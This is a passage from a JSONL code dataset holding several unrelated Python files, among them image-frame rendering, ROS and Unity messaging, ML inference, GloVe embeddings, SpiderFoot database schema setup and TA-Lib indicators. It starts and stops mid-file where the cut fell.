fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+1) ,4+1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-1) ,4+1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4+2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4+2-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\t\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=colorLota )\n\t\t\t\t\t\n\t\t\t\t\twidthsofar += words[order][1]\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif words[order+1][1] not in emotes:\n\t\t\t\t\t\t\twidthsofar += spacing\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\t\t\t\torder += 1\n\t\t\tif scrollNeeded > 2000 and height < 0 and boostonce:\n\t\t\t\tboostonce = 0\n\t\t\t\tdraw13 += 25\n\t\t\t\t\n\t\t\tframeHeight += H\n\t\t\t\n\t\t\t\n\tif scrollNeeded > 150:#speed changes on a curve\n\t\tspeed = scrollNeeded/35\n\telif scrollNeeded > 90:\n\t\tspeed = scrollNeeded / 25\n\telif scrollNeeded > 0:\n\t\tspeed = scrollNeeded / 17\n\telse:\n\t\tspeed = 0\n\tif speed > 9:\n\t\tspeed = 9\n\t\t\n\t\t\n\tif pausedFrames == 0:\n\t\tspeeds.append(speed)\n\t\tif len(speeds) > 120:\n\t\t\tspeeds.remove(speeds[0])\n\t\tfSpeed = speed\n\t\t\n\t\tfor speed in speeds:\n\t\t\tfSpeed = (fSpeed * .68) + (speed *.32) \n\t\tspeed = fSpeed\n\t\n\tif scrollNeeded > 2000 and height < 0:\n\t\tspeed = 1000\n\t\n\t\n\tnewFrame = Image.new(\"RGBA\",(W,int(1400/700*1000)))\n\theight -= speed\n\theyight = int(height)\n\tscrollNeeded -= speed\n\tnewFrame.paste(text,(0,heyight))\n\tif len(chat) == 0:\n\t\tend += 1\n\t\n\t\"\"\"\n\tframeskip+=1\n\tif frameskip == 1:\n\t\tframeskip = 0\n\t\"\"\"\n\tcount += 1\n\tnewFrame.save(filename + str(count)+\".png\",\"png\")","sub_path":"chatReplay.py","file_name":"chatReplay.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397897269","text":"#!/usr/bin/env python\n\n####################################################################\n# Takes geometry_msgs/Pose topic and sets world-frame coordinates of\n# object in unity.\n####################################################################\n\n\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Pose, PoseStamped\n\nfrom tf.transformations import euler_from_quaternion\n\nclass CMDInterface:\n def __init__(self):\n self.pub = rospy.Publisher('unity_cmd', String, queue_size=10)\n self.unity_name = rospy.get_param('~unity_name')\n\n def pose_cb(self, pose_cmd):\n msg = String()\n\n\n euler_angles = euler_from_quaternion((pose_cmd.orientation.x, \\\n pose_cmd.orientation.y, \\\n pose_cmd.orientation.z, \\\n pose_cmd.orientation.w))\n cmd = (pose_cmd.position.x, \\\n pose_cmd.position.y, \\\n pose_cmd.position.z, \\\n euler_angles[0], \\\n euler_angles[1], \\\n euler_angles[2])\n\n msg.data = self.unity_name + ' pose ' + ' '.join(map(str, cmd))\n self.pub.publish(msg)\n\nif __name__ == '__main__':\n try:\n rospy.init_node('pose_to_unity_cmd_node', anonymous=True)\n iface = CMDInterface()\n sub = rospy.Subscriber('pose_cmd', Pose, iface.pose_cb)\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"arl_unity_ros_abstract/src/pose_to_unity.py","file_name":"pose_to_unity.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"33660099","text":"import heapq\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def mergeKLists(self, lists):\n heap = []\n head = None\n for node in lists:\n if node is not None:\n heapq.heappush(heap,(node.val,node))\n while len(heap) is not 0:\n temp = heapq.heappop(heap)[1]\n if head is None:\n head = temp\n current = head\n else:\n current.next = temp\n current = current.next\n if temp.next is not None:\n heapq.heappush(heap,(temp.next.val,temp.next))\n return head","sub_path":"LeetCode/Algorithms/merge_sorted_lists.py","file_name":"merge_sorted_lists.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"290363010","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/3 下午8:35\n# @Author : zxq\n# @File : model_infer.py\n# @Software: PyCharm\nimport json\nimport os\n\nimport cv2\nimport mmcv\nimport numpy as np\nimport torch\nfrom mmcv import Config\n\nfrom mmcls.models import build_classifier\n\nid_to_class = {\n 0: \"normal\",\n 1: \"calling\",\n 2: \"smoking\"\n}\n\nif __name__ == '__main__':\n cfg = Config.fromfile('../../configs/imagenet/ciga_call_cfg.py')\n data_path = '/home/zxq/PycharmProjects/data/ciga_call/test'\n json_file_path = '/home/zxq/PycharmProjects/data/ciga_call/result.json'\n # json1_file_path = '/home/zxq/Downloads/result.json'\n # f = open(json_file_path, mode='r+')\n # content = json.load(f)\n json_file = open(json_file_path, mode='w')\n weight_path = '../../work_dir/version02/epoch_100.pth'\n model = build_classifier(cfg.model)\n model.eval()\n save_path = os.path.join(os.path.dirname(cfg.data.test.data_prefix), 'test_result')\n mmcv.mkdir_or_exist(save_path)\n\n mean_value = None\n std_value = None\n for step_ in cfg.test_pipeline:\n if step_['type'] is 'Normalize':\n mean_value = np.array(step_['mean'])\n std_value = np.array(step_['std'])\n img_name_list = os.listdir(data_path)\n save_json_content = []\n # k = 0\n for img_name in img_name_list:\n img_dir = os.path.join(data_path, img_name)\n print(img_dir)\n img = cv2.imread(img_dir)\n\n # 1, resize\n img_resized = mmcv.imresize(img, (256, 256))\n\n # 2, Normalize\n img_normalized = mmcv.imnormalize(img_resized, mean_value, std_value)\n\n # 3, switch dim and to tensor\n input_data = torch.Tensor(np.transpose(img_normalized, [2, 0, 1]))\n\n # 4, add batch dim\n batch_data = torch.unsqueeze(input_data, 0)\n # 4, infer\n model.load_state_dict(torch.load(weight_path, map_location='cpu')['state_dict'])\n model_output = model(batch_data, return_loss=False)\n output_normalized = torch.nn.functional.softmax(model_output, dim=1)\n output_numpy = output_normalized.detach().numpy()\n cls_output = np.argmax(output_numpy, axis=1)\n print(np.round(output_numpy[0][cls_output[0]], 5))\n\n result_json = {\n \"image_name\": img_name,\n \"category\": id_to_class[cls_output[0]],\n \"score\": np.round(np.float(output_numpy[0][cls_output[0]]), 5)}\n save_json_content.append(result_json)\n # json.dump(result_json, json_file, ensure_ascii=False, indent=4)\n # k += 1\n # if k > 10:\n # break\n\n save_json_content.sort(key=lambda x: int(x['image_name'][:-4]))\n json.dump(save_json_content, json_file, indent=4)\n\n","sub_path":"tools/test_tools/model_infer.py","file_name":"model_infer.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"319850711","text":"import logging\n\nimport torch\nfrom .bbox_helper import bbox_iou_overlaps\nfrom .bbox_helper import bbox_iof_overlaps\n\nlogger = logging.getLogger('global')\n\n\ndef match(bboxes, gt, cfg, gt_ignores=None):\n \"\"\"\n Match roi to gt\n\n Temporarily used tensors:\n overlaps (FloatTensor): [N, M], ious of dt(N) with gt(M)\n ignore_overlaps (FloatTensor): [N, K], ious of dt(N) with ignore regions(K)\n\n Returns:\n target (LongTensor): [N], matched gt index for each roi.\n 1. if a roi is positive, it's target is matched gt index (>=0)\n 2. if a roi is negative, it's target is -1,\n 3. if a roi isn't positive nor negative, it's target is -2;\n \"\"\"\n NEGATIVE_TARGET = -1\n IGNORE_TARGET = -2\n N = bboxes.shape[0]\n M = gt.shape[0]\n\n # check M > 0 for no-gt support\n overlaps = bbox_iou_overlaps(bboxes, gt) if M > 0 else bboxes.new_zeros(N, 1)\n ignore_overlaps = None\n if gt_ignores is not None and gt_ignores.numel() > 0:\n ignore_overlaps = bbox_iof_overlaps(bboxes, gt_ignores)\n\n target = bboxes.new_full((N, ), IGNORE_TARGET, dtype=torch.int64)\n dt_to_gt_max, dt_to_gt_argmax = overlaps.max(dim=1)\n\n # rule 1: negative if maxiou < negative_iou_thresh:\n neg_mask = dt_to_gt_max < cfg['negative_iou_thresh']\n target[neg_mask] = NEGATIVE_TARGET\n\n # rule 2: positive if maxiou > pos_iou_thresh\n pos_mask = dt_to_gt_max > cfg['positive_iou_thresh']\n target[pos_mask] = dt_to_gt_argmax[pos_mask]\n\n # rule 3: positive if a dt has highest iou with any gt\n if cfg.get('allow_low_quality_match') and M > 0:\n overlaps = overlaps.t() # IMPORTANT, for faster caculation\n gt_to_dt_max, _ = overlaps.max(dim=1)\n dt_gt_pairs = torch.nonzero((overlaps >= gt_to_dt_max[:, None] - 1e-3))\n if dt_gt_pairs.numel() > 0:\n lqm_dt_inds = dt_gt_pairs[:, 1]\n target[lqm_dt_inds] = dt_to_gt_argmax[lqm_dt_inds]\n pos_mask[lqm_dt_inds] = 1\n\n # rule 4: dt has high iou with ignore regions may not supposed to be negative\n if ignore_overlaps is not None and ignore_overlaps.numel() > 0:\n dt_to_ig_max, _ = ignore_overlaps.max(dim=1)\n ignored_dt_mask = dt_to_ig_max > cfg['ignore_iou_thresh']\n # remove positives from ignored\n ignored_dt_mask = (ignored_dt_mask ^ (ignored_dt_mask & pos_mask))\n target[ignored_dt_mask] = IGNORE_TARGET\n return target\n","sub_path":"unn/models/heads/utils/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"479089601","text":"from base_complement import * \n\n#open genome file and extract window\n\nbedfile = \"glna_cleavage.bed12\" #edit path as needed\nbed = open(bedfile, 'r')\n\nold_cleavage = \"glna_windows.txt\"\nold_sites = open(old_cleavage, 'r')\n\nnew_cleavage = \"glna_windows_newer.txt\"\nnew_sites = open(new_cleavage, 'w')\n\nfor line1 in bed:\n\tfor line2 in old_sites: \n\t\tif '>' in line2:\n\t\t\tnew_sites.write(line2)\n\t\telse: \n\t\t\tif '+' in line1: \n\t\t\t\tnew_sites.write(line2)\n\t\t\telse: \n\t\t\t\tcomp = seqcomplement(line2, 'DNA')\n\t\t\t\tnew_sites.write(comp) \n\nbed.close()\nold_sites.close()\nnew_sites.close()\n\n","sub_path":"msa/msas_with_bad_scores/daca/sequence_complement.py","file_name":"sequence_complement.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"352438097","text":"from typing import List\nfrom keras_preprocessing import sequence\nfrom keras_preprocessing.text import Tokenizer\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import MinMaxScaler\nfrom DatasetsConsumers.AbstractDataset import AbstractDataset\nfrom rootfile import ROOTPATH\nfrom utility.utility import file_exists, load, save\nimport numpy as np\nimport tensorflow as tf\n\nGLOVE_DIR = ROOTPATH + \"data/GloveWordEmbeddings/\"\n\n\nclass GloVe:\n dimensionCount = 0\n glove_file = ''\n model = {}\n\n def __init__(self, dimension_count: int):\n self.dimensionCount = dimension_count\n self.glove_file = \"glove.6B.\" + str(dimension_count) + \"d.txt\"\n # self.glove_file = 'glove.840B.300d.txt'\n\n # Load model\n def load_glove_model(self):\n if len(self.model) is not 0:\n return\n print('Features / Weights matrix not found.')\n print(\"Loading Glove word embeddings\")\n num_lines = 0\n line_counter = 0\n with open(GLOVE_DIR + self.glove_file, 'r+', encoding=\"utf8\") as f:\n for _ in f:\n num_lines += 1\n with open(GLOVE_DIR + self.glove_file, 'r+', encoding=\"utf8\") as f:\n for line in f:\n line_counter += 1\n if line_counter % int(num_lines / 10) == 0:\n print(\"{:.2f}%\".format(line_counter / (int(num_lines / 100) * 100) * 100))\n split_line = line.split()\n word = split_line[0]\n\n if len(split_line) > self.dimensionCount + 1:\n continue\n embedding = np.asarray(split_line[1:], dtype='float32')\n self.model[word] = embedding\n print(\"Done.\", len(self.model), \" tokens loaded!\")\n\n def get_weights_matrix(self, emails: List[List[str]], dataset: AbstractDataset, dataset_mode):\n wm_file_name = dataset_mode + \"/\" + \"{}_weights_matrix_{}\".format(dataset.get_name(), self.dimensionCount)\n\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(emails)\n sequences = tokenizer.texts_to_sequences(emails)\n sequences_matrix = sequence.pad_sequences(sequences, maxlen=256)\n if file_exists(wm_file_name):\n return load(wm_file_name), sequences_matrix\n\n self.load_glove_model()\n vocab_size = len(tokenizer.word_index) + 1\n weights_matrix = np.zeros((vocab_size, self.dimensionCount))\n for word, i in tokenizer.word_index.items():\n embedding_vector = self.model.get(word)\n if embedding_vector is not None:\n weights_matrix[i] = embedding_vector\n weights_matrix = tf.convert_to_tensor(weights_matrix)\n save(weights_matrix, wm_file_name)\n return weights_matrix, sequences_matrix\n\n # Check if features exist\n def get_features(self, emails: np.array, dataset: AbstractDataset):\n print(\"Loading embedding features\")\n feature_file_name = dataset.mode + \"/\" + dataset.get_name() + '_features_' + str(self.dimensionCount)\n if file_exists(feature_file_name):\n return load(feature_file_name)\n self.load_glove_model()\n sum_vectors_array = self.sum_vectors(emails)\n features = preprocessing.scale(sum_vectors_array)\n save(features, feature_file_name)\n return features\n\n def sum_vectors(self, words_in_emails):\n all_vector_sum = []\n for i in range(len(words_in_emails)):\n words = words_in_emails[i]\n vector_sum = np.zeros(self.dimensionCount)\n for word in words:\n if word in self.model:\n word_vector = self.model[word]\n vector_sum += word_vector\n all_vector_sum.append(vector_sum)\n scaler = MinMaxScaler()\n scaler.fit(all_vector_sum)\n MinMaxScaler(copy=True, feature_range=(0, 1))\n normed_vectors = scaler.transform(all_vector_sum)\n return normed_vectors\n","sub_path":"src/Glove/glovemodel.py","file_name":"glovemodel.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"644153478","text":"class Torch:\n\tdef __init__(self, app):\n\t\tself.app=app\n\t\tself.ledstatus=0\n\t\tself.npstatus=0\n\n\tdef run(self):\n\t\tchange=True\n\t\tclose_app=False\n\t\ti=0\n\t\tj=0\n\t\tred=0\n\t\tgreen=0\n\t\tblue=0\n\t\tdatau_old=0\n\t\tdatad_old=0\n\t\tdatas_old=0\n\t\tdata={}\n\t\tcolor_picker = False\n\t\tsecond_column = False\n\t\tnext_app=False\n\t\twhile((not close_app) and self.app.isAlive()):\n\t\t\tif (change):\n\t\t\t\t\tchange=False\n\t\t\t\t\tself.app.newImg()\n\t\t\t\t\tif not color_picker:\n\t\t\t\t\t\tself.app.setText((45,0), \"TORCH \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,10),\"TOP \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,20),\"SIDE \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,30),\"MENU \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((1,10+i*10),\">\", 255,self.app.getFonts()[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.app.setText((10,0),\"RED \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,0),str(red), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,10),\"GREEN \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,10),str(green), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,20),\"BLUE \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,20),str(blue), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,30),\"SET \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,40),\"RESET \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,50),\"BACK \", 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tself.app.setText((60,j*10),\">\", 255,self.app.getFonts()[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.app.setText((1,j*10),\">\", 255,self.app.getFonts()[0])\n\n\t\t\t\t\tdata=self.app.sendImg_and_recvData()\n\t\t\telse:\n\t\t\t\tdata=self.app.recvData()\n\t\t\t\n\t\t\t#print(data)\t\n\t\t\tif (data['DOWN']!=datad_old):\n\t\t\t\tdatad_old=data['DOWN']\n\t\t\t\tif(datad_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tif red > 0:\n\t\t\t\t\t\t\t\t\tred -=1\n\t\t\t\t\t\t\tif j==1:\n\t\t\t\t\t\t\t\tif green > 0:\n\t\t\t\t\t\t\t\t\tgreen -= 1\n\t\t\t\t\t\t\tif j==2:\n\t\t\t\t\t\t\t\tif blue > 0:\n\t\t\t\t\t\t\t\t\tblue -= 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==5:\n\t\t\t\t\t\t\t\tj=0\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tj+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==2):\n\t\t\t\t\t\t\ti=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ti+=1\n\n\t\t\t\t\tchange=True\n\t\t\telif (data['UP']!=datau_old):\n\t\t\t\tdatau_old=data['UP']\n\t\t\t\tif(datau_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tif red < 255:\n\t\t\t\t\t\t\t\t\tred +=1\n\t\t\t\t\t\t\tif j==1:\n\t\t\t\t\t\t\t\tif green < 255:\n\t\t\t\t\t\t\t\t\tgreen += 1\n\t\t\t\t\t\t\tif j==2:\n\t\t\t\t\t\t\t\tif blue < 255:\n\t\t\t\t\t\t\t\t\tblue += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tj=5\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tj-=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==0):\n\t\t\t\t\t\t\ti=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ti-=1\n\n\t\t\t\t\tchange=True\n\t\t\telif(data['SELECT']!=datas_old):\n\t\t\t\tdatas_old=data['SELECT']\n\t\t\t\tif(datas_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tsecond_column = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==3:\n\t\t\t\t\t\t\t\tself.app.setNeopixel([red,green,blue])\n\t\t\t\t\t\t\telif j==4:\n\t\t\t\t\t\t\t\tred = 0\n\t\t\t\t\t\t\t\tgreen = 0\n\t\t\t\t\t\t\t\tblue = 0\n\t\t\t\t\t\t\t\tself.app.setNeopixel([red,green,blue])\n\t\t\t\t\t\t\telif j==5:\n\t\t\t\t\t\t\t\tcolor_picker = False\n\t\t\t\t\t\t\t\tj=0\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tsecond_column = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==2):\n\t\t\t\t\t\t\tnext_app=True\n\t\t\t\t\t\telif(i==1):\n\t\t\t\t\t\t\tself.ledstatus=not self.ledstatus\n\t\t\t\t\t\t\tself.app.setOutPin(16, self.ledstatus)\n\t\t\t\t\t\telif(i==0):\n\t\t\t\t\t\t\t'''self.npstatus= not self.npstatus\n\t\t\t\t\t\t\tself.app.setNeopixel([255*self.npstatus,255*self.npstatus,255*self.npstatus])'''\n\t\t\t\t\t\t\tcolor_picker = True\n\n\t\t\t\t\tchange = True\n\n\t\t\t#self.app.setNeopixel([red,green,blue])\n\n\t\t\tif (next_app and data['SELECT']==0):\n\t\t\t\tnext_app=False\n\t\t\t\tclose_app = True\n\n\t\treturn -1\n\n\n","sub_path":"eulero/src/torch.py","file_name":"torch.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271171356","text":"#-------------------------------------------------------------------------------\r\n# Name: sfdbsetup\r\n# Purpose: Create a new SpiderFoot database.\r\n#\r\n# Author: Steve Micallef \r\n#\r\n# Created: 15/02/2013\r\n# Copyright: (c) Steve Micallef 2013\r\n# Licence: GPL\r\n#-------------------------------------------------------------------------------\r\n\r\nimport sqlite3\r\nimport sys\r\n\r\nclass SpiderFootDbInit:\r\n def __init__(self, opts):\r\n\r\n # connect() will create the database file if it doesn't exist, but\r\n # at least we can use this opportunity to ensure we have permissions to\r\n # read and write to such a file.\r\n dbh = sqlite3.connect(opts['__database'], timeout=10)\r\n if dbh == None:\r\n sf.error(\"Could not initialize internal database. Check that \" + \\\r\n opts['__database'] + \" is readable and writable.\")\r\n dbh.text_factory = str\r\n self.conn = dbh\r\n self.dbh = dbh.cursor()\r\n return\r\n\r\n # Close the database handle\r\n def close(self):\r\n self.dbh.close()\r\n\r\n def create(self):\r\n queries = [\r\n \"PRAGMA journal_mode=WAL\",\r\n \"CREATE TABLE tbl_event_types ( \\\r\n event VARCHAR NOT NULL PRIMARY KEY, \\\r\n event_descr VARCHAR NOT NULL, \\\r\n event_raw INT NOT NULL DEFAULT 0 \\\r\n )\",\r\n \"CREATE TABLE tbl_config ( \\\r\n scope VARCHAR NOT NULL, \\\r\n opt VARCHAR NOT NULL, \\\r\n val VARCHAR NOT NULL, \\\r\n PRIMARY KEY (scope, opt) \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_instance ( \\\r\n guid VARCHAR NOT NULL PRIMARY KEY, \\\r\n name VARCHAR NOT NULL, \\\r\n seed_target VARCHAR NOT NULL, \\\r\n created INT DEFAULT 0, \\\r\n started INT DEFAULT 0, \\\r\n ended INT DEFAULT 0, \\\r\n status VARCHAR NOT NULL \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_log ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n generated INT NOT NULL, \\\r\n component VARCHAR, \\\r\n type VARCHAR NOT NULL, \\\r\n message VARCHAR \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_config ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n component VARCHAR NOT NULL, \\\r\n opt VARCHAR NOT NULL, \\\r\n val VARCHAR NOT NULL \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_results ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n hash VARCHAR NOT NULL, \\\r\n type VARCHAR NOT NULL REFERENCES tbl_event_types(event), \\\r\n generated INT NOT NULL, \\\r\n confidence INT NOT NULL DEFAULT 100, \\\r\n visibility INT NOT NULL DEFAULT 100, \\\r\n risk INT NOT NULL DEFAULT 0, \\\r\n module VARCHAR NOT NULL, \\\r\n data VARCHAR, \\\r\n source_event_hash VARCHAR DEFAULT 'ROOT' \\\r\n )\",\r\n \"CREATE INDEX idx_scan_results_id ON tbl_scan_results (scan_instance_id)\",\r\n \"CREATE INDEX idx_scan_results_type ON tbl_scan_results (scan_instance_id, type)\",\r\n \"CREATE INDEX idx_scan_results_hash ON tbl_scan_results (hash)\",\r\n \"CREATE INDEX idx_scan_logs ON tbl_scan_log (scan_instance_id)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('AFFILIATE', 'Affiliate', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('EMAILADDR', 'Email Address', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('GEOINFO', 'Physical Location', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('HTTP_CODE', 'HTTP Status Code', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('INITIAL_TARGET', 'User-Supplied Target', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('IP_ADDRESS', 'IP Address', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('NETBLOCK', 'Netblock Ownership', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('LINKED_URL_INTERNAL', 'Linked URL - Internal', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('LINKED_URL_EXTERNAL', 'Linked URL - External', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('RAW_DATA', 'Raw Data', 1)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('SUBDOMAIN', 'Sub-domain', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('SIMILARDOMAIN', 'Similar Domain', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('TCP_PORT_OPEN', 'Open TCP Port', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_FORM', 'URL (Form)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_FLASH', 'URL (Uses Flash)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_JAVASCRIPT', 'URL (Uses Javascript)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_JAVA_APPLET', 'URL (Uses Java applet)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_STATIC', 'URL (Purely Static)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_PASSWORD', 'URL (Accepts Passwords)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_UPLOAD', 'URL (Accepts Uploads)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_BANNER', 'Web Server', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_HTTPHEADERS', 'HTTP Headers', 1)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_TECHNOLOGY', 'Web Technology', 0)\"\r\n ]\r\n\r\n try:\r\n for qry in queries:\r\n self.dbh.execute(qry)\r\n self.conn.commit()\r\n except sqlite3.Error as e:\r\n raise BaseException(\"SQL error encountered when setting up database: \" +\r\n e.args[0])\r\n\r\n","sub_path":"sfdbsetup.py","file_name":"sfdbsetup.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"5673466","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nclass Input:\n\n def __init__(self, x: np.array, shape: tuple, nombre: str = \"Input_layer\"):\n \"\"\"EL\n shape: lista de shape debe ser ancho, alto y capas\"\"\"\n self.X = x\n self.shape = shape\n self.nombre = nombre\n self.capas = None\n self.index = 0\n assert x.shape == shape, f\"El shape de los datos {x.shape[1:]} es diferente del input indicado {shape}\"\n\n\n def __str__(self, ):\n return f\"Input: {self.nombre}, shape= {self.shape}, type: {type(self.X)}\"\n\n\nif __name__ == '__main__':\n volumen_random = np.random.random(9)\n df = np.array([volumen_random/(1+np.square(x)) for x in range(10)])\n entrada = Input(x=df, shape=(9,))\n print(entrada.__dict__)\n","sub_path":"Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"565943433","text":"import talib\nimport getting_data as gd\nimport numpy as np \nimport pandas as pd\n\n\n# Pandas dataframe settiongs\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n# to reset that option: \n# pd.reset_option('display.float_format')\n# Set all values to five decimal places instead of scientific notation\n\n# Supressing SettingWithCopyWarning Message: REVISE LATER\npd.options.mode.chained_assignment = None # default='warn'\n\n\ndef ADX(df):\n data = df[[\"High\", \"Low\", \"Adj Close\"]]\n adx = talib.ADX(data[\"High\"], data[\"Low\"], data[\"Adj Close\"], timeperiod=14)\n df[\"ADX\"] = pd.Series(adx, index=df.index)\n\n return df\n\ndef MACD(df):\n data = df[\"Adj Close\"]\n macd, macdsignal, macdhist = talib.MACD(data, fastperiod=12, slowperiod=26, signalperiod=9)\n df[\"MACD\"] = pd.Series(macd, index=df.index)\n\n return df\n\n\ndef ATR(df):\n data = df[[\"High\", \"Low\", \"Adj Close\"]] \n atr 